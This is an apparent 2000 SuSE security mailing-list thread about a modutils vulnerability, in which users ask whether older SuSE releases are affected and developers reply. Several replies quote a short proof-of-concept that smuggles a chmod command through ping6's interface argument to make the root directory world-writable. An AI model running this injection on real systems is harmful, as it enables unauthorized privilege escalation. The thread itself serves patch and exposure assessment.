Hi, I'm a little confused about the modutils / modules security upgrade. The announcement from SuSE stated that 6.4/7.0 are affected, as it's only more recent versions of modutils that are vulnerable. However, the announcement on the kernel mailing list stated that modutils versions > 2.1.121 are vulnerable. Checking on my SuSE 6.1 system with /sbin/modprobe -V shows that it's running version 2.2.2-pre6. So - are versions of SuSE prior to 6.4 vulnerable to this problem as well? If so, will suse be producing an upgrade, or do I need to upgrade modutils from source? Thanks, J. | John Patterson / Jarel on Snowplains (telnet to snowplains.org 3456) | | Email: jarel@snowplains.org | Web: http://snowplains.org/~jarel/ |
On Tue, 14 Nov 2000, John wrote:
Hi,
I'm a little confused about the modutils / modules security upgrade.
The announcement from SuSE stated that 6.4/7.0 are affected, as it's only more recent versions of modutils that are vulnerable.
However, the announcement on the kernel mailing list stated that modutils versions > 2.1.121 are vulnerable. Checking on my SuSE 6.1 system with /sbin/modprobe -V shows that it's running version 2.2.2-pre6.
So - are versions of SuSE prior to 6.4 vulnerable to this problem as well? If so, will suse be producing an upgrade, or do I need to upgrade modutils from source?
Since this bug needs ping6 to be exploited and this isnt shiped on <6.4, it could be hard to exploit. If paranoid, update modules package. It cant hurt you :) S.
Hi! Sebastian Krahmer schrieb am Tue, 14 Nov 2000 um 11:49:
On Tue, 14 Nov 2000, John wrote:
versions > 2.1.121 are vulnerable. Checking on my SuSE 6.1 system with /sbin/modprobe -V shows that it's running version 2.2.2-pre6.
Since this bug needs ping6 to be exploited and this isnt shiped on <6.4, it could be hard to exploit. If paranoid, update modules package. It cant hurt you :)
Maybe I got something wrong; as far as I understand the problem, the bug does not "need" ping6 to be exploited, but it's the published exploit (bugtraq) being written to use ping6 for it's means. In other words: SuSE < 6.4 should be script kiddy safe (as the published exploit will not work), but it is at least possible, if not likely, that our boxes still are vulnerable... I'd really like to see updated packages from SuSE. Bye, Bastian -- Bastian Friedrich bastian@bastian-friedrich.de Adress & Fon available on my HP http://www.bastian-friedrich.de/ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ \ ech`echo "xiun" | tr nu oc | sed 'sx\([sx]\)\([xoi]\)xo un\2\1 is xg'`ol
Maybe I got something wrong; as far as I understand the problem, the bug does not "need" ping6 to be exploited, but it's the published exploit (bugtraq) being written to use ping6 for it's means.
In other words: SuSE < 6.4 should be script kiddy safe (as the published exploit will not work), but it is at least possible, if not likely, that our boxes still are vulnerable...
I'd really like to see updated packages from SuSE.
Bye, Bastian
Not quite. The "exploit" is trivial:
cd /
ping6 -I ';chmod 777 .'
ls -lad .
You don't need any kind of script. But: ping6 is the only program known so
far that could trigger the loading of modules with arbitrary names.
Roman.
--
- -
| Roman Drahtmüller
On Tue, 14 Nov 2000, Roman Drahtmueller wrote:
You don't need any kind of script. But: ping6 is the only program known so far that could trigger the loading of modules with arbitrary names.
Maybe, but Bastian's original question remains unanswered: SuSE 6.3 shipped with modules-2.3.6-3. Does this version already contain the vulnerability? And if so, can we expect a fixed RPM from SuSE? With a few million lines of custom code on 500+ SuSE 6.3 boxes here, it is not too assuring that ping6 is the only package _you_ know to exploit the bug. Cheers, Knut -- Knut Woller My opinions do not necessarily DESY -IT- reflect the views of my employer. Hamburg And vice versa.
Maybe, but Bastian's original question remains unanswered: SuSE 6.3 shipped with modules-2.3.6-3. Does this version already contain the vulnerability? And if so, can we expect a fixed RPM from SuSE?
With a few million lines of custom code on 500+ SuSE 6.3 boxes here, it is not too assuring that ping6 is the only package _you_ know to exploit the bug.
Cheers, Knut
Right. I'll have the other distributions updated, too.
It's better...
Roman.
--
- -
| Roman Drahtmüller
On Tue, 14 Nov 2000, Roman Drahtmueller wrote:
Maybe I got something wrong; as far as I understand the problem, the bug does not "need" ping6 to be exploited, but it's the published exploit (bugtraq) being written to use ping6 for it's means.
In other words: SuSE < 6.4 should be script kiddy safe (as the published exploit will not work), but it is at least possible, if not likely, that our boxes still are vulnerable...
I'd really like to see updated packages from SuSE.
Bye, Bastian
Not quite. The "exploit" is trivial:
cd / ping6 -I ';chmod 777 .' ls -lad .
You don't need any kind of script. But: ping6 is the only program known so far that could trigger the loading of modules with arbitrary names. Yes. For SuSE. Our ping is different from RH. They are vuln via ping :)
However, the modules package has this bug. What quickly comes in mind is pppd and traceroute (beside ping6). At least traceroute didnt worked for me on some systems. S.
...
Not quite. The "exploit" is trivial:
cd / ping6 -I ';chmod 777 .' ls -lad .
You don't need any kind of script. But: ping6 is the only program known so far that could trigger the loading of modules with arbitrary names. ... Hmm, as far as my SuSE 7 Pro is concerned the module is always loaded and I found no cronjob or whatever which does some rmmod -a. So as long as I dunno unload it's not exploitable anyway - or did I miss the point?
Tobias
participants (6)
-
Bastian Friedrich
-
John
-
Knut Woller
-
Roman Drahtmueller
-
Sebastian Krahmer
-
tlietke@pop.gmx.de